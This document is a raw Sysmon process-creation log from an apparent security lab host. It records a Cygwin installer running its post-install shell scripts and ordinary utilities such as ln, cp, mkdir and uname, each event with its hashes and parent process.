"/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054917Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.991{A8622C2F-53FF-6078-580B-00000000AE01}5640C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-570B-00000000AE01}6064C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.984{A8622C2F-53FF-6078-570B-00000000AE01}6064C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.976{A8622C2F-53FF-6078-560B-00000000AE01}1476C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-53FF-6078-550B-00000000AE01}1100C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.968{A8622C2F-53FF-6078-550B-00000000AE01}1100C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:59.959{A8622C2F-53FF-6078-540B-00000000AE01}6852C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-530B-00000000AE01}6884C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.951{A8622C2F-53FF-6078-530B-00000000AE01}6884C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054852Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.932{A8622C2F-53FF-6078-520B-00000000AE01}5084C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-53FF-6078-510B-00000000AE01}4160C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054842Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.923{A8622C2F-53FF-6078-510B-00000000AE01}4160C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054829Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.907{A8622C2F-53FF-6078-500B-00000000AE01}5828C:\cygwin64\bin\cygpath.exe-----"C:\cygwin64\bin\cygpath.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1E43FD705AA6BC83C6A7D7F990220D26,SHA256=9D332ABE061AA831770D84F3A7AEA3A069873CFD7240B456A71E82E0E5A828DC,IMPHASH=41B7C52F77C32CD14B1D4CB1E0D93583{A8622C2F-53FF-6078-4F0B-00000000AE01}3420C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.899{A8622C2F-53FF-6078-4F0B-00000000AE01}3420C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:59.885{A8622C2F-53FF-6078-4E0B-00000000AE01}6332C:\cygwin64\bin\uname.exe-----"C:\cygwin64\bin\uname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=75B3A9DE22D28DFE34FC8B0C747B1B1F,SHA256=5E34E4152BD98DB6D32A543A7812ECF543933905123FE5BF82B708B5EAC0E50D,IMPHASH=8B550AB258E8F33E9A5161733CA078D7{A8622C2F-53FF-6078-4D0B-00000000AE01}4604C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054796Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.877{A8622C2F-53FF-6078-4D0B-00000000AE01}4604C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054778Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.837{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054767Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:59.823{A8622C2F-53FF-6078-4A0B-00000000AE01}5664C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-490B-00000000AE01}924C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.816{A8622C2F-53FF-6078-490B-00000000AE01}924C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.808{A8622C2F-53FF-6078-480B-00000000AE01}7016C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-470B-00000000AE01}5108C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.800{A8622C2F-53FF-6078-470B-00000000AE01}5108C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.792{A8622C2F-53FF-6078-460B-00000000AE01}6032C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-450B-00000000AE01}5620C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054715Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.784{A8622C2F-53FF-6078-450B-00000000AE01}5620C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:59.777{A8622C2F-53FF-6078-440B-00000000AE01}4288C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-430B-00000000AE01}6268C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054694Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.769{A8622C2F-53FF-6078-430B-00000000AE01}6268C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.761{A8622C2F-53FF-6078-420B-00000000AE01}5996C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-410B-00000000AE01}1844C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054673Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.753{A8622C2F-53FF-6078-410B-00000000AE01}1844C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.745{A8622C2F-53FF-6078-400B-00000000AE01}3788C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-3F0B-00000000AE01}3912C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.738{A8622C2F-53FF-6078-3F0B-00000000AE01}3912C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:59.729{A8622C2F-53FF-6078-3E0B-00000000AE01}5860C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-3D0B-00000000AE01}6364C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.721{A8622C2F-53FF-6078-3D0B-00000000AE01}6364C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054620Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.711{A8622C2F-53FF-6078-3C0B-00000000AE01}5404C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-3B0B-00000000AE01}1612C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.703{A8622C2F-53FF-6078-3B0B-00000000AE01}1612C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054594Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.665{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.650{A8622C2F-53FF-6078-380B-00000000AE01}5744C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-53FF-6078-370B-00000000AE01}3008C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054573Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.642{A8622C2F-53FF-6078-370B-00000000AE01}3008C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/coreutils.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-330B-00000000AE01}6336C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054562Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.632{A8622C2F-53FF-6078-360B-00000000AE01}924C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-53FF-6078-350B-00000000AE01}1496C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.623{A8622C2F-53FF-6078-350B-00000000AE01}1496C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-330B-00000000AE01}6336C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/coreutils.sh" 154100x800000000000000054536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.584{A8622C2F-53FF-6078-330B-00000000AE01}6336C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/coreutils.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.564{A8622C2F-53FF-6078-320B-00000000AE01}6196C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-310B-00000000AE01}3176C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.556{A8622C2F-53FF-6078-310B-00000000AE01}3176C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
